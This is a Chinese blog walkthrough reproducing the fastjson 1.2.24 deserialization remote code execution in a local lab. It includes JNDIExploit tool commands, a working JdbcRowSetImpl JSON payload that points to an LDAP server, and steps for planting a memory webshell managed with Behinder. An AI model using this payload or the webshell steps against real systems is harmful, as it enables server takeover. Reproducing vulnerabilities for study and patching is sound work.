fastjson1.2.24反序列化RCE

于 2024-06-24 23:59:21 发布
阅读量515 收藏 19
点赞数 23
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61860998/article/details/139941242
版权

漏洞描述

fastjson序列化/反序列化原理

fastjson的漏洞本质还是一个java的反序列化漏洞,由于引进了AutoType功能,fastjson在对json字符串反序列化的时候,会读取到@type的内容,将json内容反序列化为java对象并调用这个类的setter方法。

影响版本

Fastjson < 1.2.25

漏洞复现

环境:

jdk 1.8            jndi利用工具         冰蝎4.1     IDEA2024                                                                      maven 3.9.8     JNDIExploit-1.4-SNAPSHOT.jar  

之前的文章写过maven的配置这里不再过多说

idea新建一个项目,基于Windows平台,使用环境目录下的fastjsondemo环境,拷贝后使用Idea打开fastjsondemo文件夹,下载maven资源,运行DemoApplication类,即可启动环境。

然后打开127.0.0.1:8089         (这里端口是自己设置的)

可以看到已经搭建好了

此时开始运行JNDIExploit-1.4-SNAPSHOT.jar这个利用工具

命令:依次执行

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1  -u

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 127.0.0.1 

运行完后开始抓包,抓到正常包之后发送repeater开始构造

先改请求方式,改为post

然后在host下添加cmd:空格+要执行的命令

content-type 改为application/json

在最下面添加上请求内容

{"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho","autoCommit":true}}

如下图

点击发送,成功执行命令

接下来尝试打入内存马

打开刚刚的jndi工具选择一个你要添加的,这里有些需要不一样的shell管理工具

在下面这个位置构造payload,直接发送

打开冰蝎新建连接

连接成功直接rce

修复建议:

将Fastjson升级至最新版本即可

J0Y学安全
关注
  • 23
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastjson 反序列化RCE,远程命令执行漏洞CVE、CNVD(2022年12月最新)
qq1140037586的博客
12-18 2215
漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。
网络安全深入学习第七课——热门框架漏洞(RCEFastjson反序列化漏洞)
p36273的博客
09-18 1697
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
FastjsonRCE1.2.47】漏洞复现
最新发布
02-24 1301
Fastjson漏洞原理和RCE1.2.47漏洞复现
fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
qq_51163834的博客
06-24 803
fastjson是java的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象。
Fastjson 1.2.24反序列化漏洞
weixin_51151498的博客
01-04 577
Fastjson 1.2.24反序列化漏洞
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
FastJson反序列化
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的反序列化方法,通过两个bean,进行封装
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
本篇将详细介绍如何在Spring Boot中配置Fastjson进行序列化和反序列化,以实现与Redis的高效交互。 Fastjson是阿里巴巴开发的一款高性能的JSON处理库,它提供了快速的序列化和反序列化能力,支持多种Java类型,包括...
fastjson1.2.24含源码
02-04
- 支持自定义的序列化和反序列化策略,满足个性化需求。 - 支持日期、BigDecimal等复杂类型的处理。 7. **应用场景** Fastjson广泛应用于各种Java项目,如Web开发、数据分析、API接口开发等,尤其在处理大量JSON...
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 404
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
Fastjson RCE漏洞复现和理解
Delphinidae
03-28 2395
漏洞:fastjson 远程代码执行漏洞 漏洞原因:fastjson在执行反序列化时加载数据被注入,注入的数据被解析执行导致任意命令执行。 漏洞历史:现在fastjson的版本已经到了1.2.73了,但是历史上高危漏洞频繁出现。 如:1.2.24 出的反序列漏洞,经过对类的黑名单限制和autotype的关闭、checkautotype等,还是还被绕过限制,如:1.2.47,1.2.68 的漏洞,都是绕过限制加载恶意的类并造成远程代码执行的高危漏洞。 漏洞复现:复现版本是1.2.47。 漏洞复现github上
Fastjson反序列化漏洞——fastjson RCE漏洞的源头(1.2.24-rce)
m0_71263989的博客
02-20 1018
FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。近几年来fastjson漏洞层出不穷,本文将谈谈近几年来fastjson RCE漏洞的源头:17年fastjson爆出的1.2.24反序列化漏洞。以这个漏洞为基础,详细分析fastjson漏洞的一些细节问题。
反序列化FastJson1.2.24 反序列化漏洞解析(CVE-2017-18349)
Continuejww的博客
09-17 323
基于Vulhub平台完整复现+CVE-2017-18349复现+注意事项。
Fastjson 1.2.47 RCE漏洞复现
wutiangui的博客
11-07 353
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。修改用户信息发现有回显。2.开启http服务。
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3082
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
Fastjson 1.2.24 反序列化漏洞研究
辛勤搬砖的门卫的专栏
01-05 1205
Fastjson 反序列化漏洞
Java - FastjsonRCE攻击模拟(远程代码执行漏洞)
Zong_0915的博客
12-03 1504
Java - FastjsonRCE问题分析及攻击模拟(远程代码执行漏洞)Fastjson出现RCE问题的必要前提分析 首先,本文的Fastjson相关的RCE问题,针对于版本在1.2.24以下的。 Fastjson出现RCE问题的必要前提分析
fastjson 1.2.24 反序列化导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在反序列化漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson反序列化时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议用户尽快升级 fastjson 版本,或者采取其他安全措施来防范该漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值